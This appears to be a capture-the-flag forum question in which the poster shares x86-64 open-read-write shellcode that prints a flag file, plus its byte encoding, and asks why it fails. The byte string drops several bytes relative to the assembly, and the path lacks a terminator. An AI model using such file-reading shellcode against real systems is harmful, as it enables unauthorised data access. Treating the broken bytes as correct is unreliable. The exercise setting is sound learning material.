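Resolved
There's practically no difference from the code in the solution, so why doesn't it work?
I'm trying to do this by writing the code myself rather than using pwntools features, but it doesn't work.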
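__asm__(
".global run_sh\n"
"run_sh:\n"
/* Push the path string onto the stack 8 bytes at a time, last chunk first */
"mov rax, 0x676E6F6F6F6F6F6F\n" /* "oooooong" */
"push rax \n"
"mov rax, 0x6C5F73695F656D61\n" /* "ame_is_l" */
"push rax \n"
"mov rax, 0x6E5F67616C662F63\n" /* "c/flag_n" */
"push rax \n"
"mov rax, 0x697361625F6C6C65\n" /* "ell_basi" */
"push rax \n"
"mov rax, 0x68732F656D6F682F \n" /* "/home/sh" */
"push rax \n"
/* open(rdi = path at rsp, rsi = 0, rdx = 0): syscall number 2 */
"mov rdi, rsp\n"
"xor rsi, rsi\n"
"xor rdx, rdx\n"
"mov rax, 2\n"
"syscall\n"
/* read(rdi = fd returned by open, rsi = rsp - 0x30, rdx = 0x30): syscall number 0 */
"mov rdi, rax\n"
"mov rsi, rsp\n"
"sub rsi, 0x30\n"
"mov rdx, 0x30\n"
"mov rax, 0x0\n"
"syscall\n"
/* write(rdi = 1 (stdout), rsi and rdx unchanged from read): syscall number 1 */
"mov rdi, 1\n"
"mov rax, 0x1\n"
"syscall\n"
);
void run_sh();
int main() { run_sh(); }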
The assembly code is as follows.
I obtained the shellcode with objdump,
\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6e\x67\x50\x48\xb8\x61\x6d\x65\x5f\x73\x5f\x6c\x50\x48\xb8\x63\x2f\x66\x6c\x67\x5f\x6e\x50\x48\xb8\x65\x6c\x6c\x5f\x61\x73\x69\x50\x48\xb8\x2f\x68\x6f\x6d\x2f\x73\x68\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x02\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\x48\x83\xee\x30\x48\xc7\xc2\x30\x00\x00\x48\xc7\xc0\x00\x00\x00\x0f\x05\x48\xc7\xc7\x01\x00\x00\x48\xc7\xc0\x01\x00\x00\x0f\x05
and this is what came out.
#pwnable